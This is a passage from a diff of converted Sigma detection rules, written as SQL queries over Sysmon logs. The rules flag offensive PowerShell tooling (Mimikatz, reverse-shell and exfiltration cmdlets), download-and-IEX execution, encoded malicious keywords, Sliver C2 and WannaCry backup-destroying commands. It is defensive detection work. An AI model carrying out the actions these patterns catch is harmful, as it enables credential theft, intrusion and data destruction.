'%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR 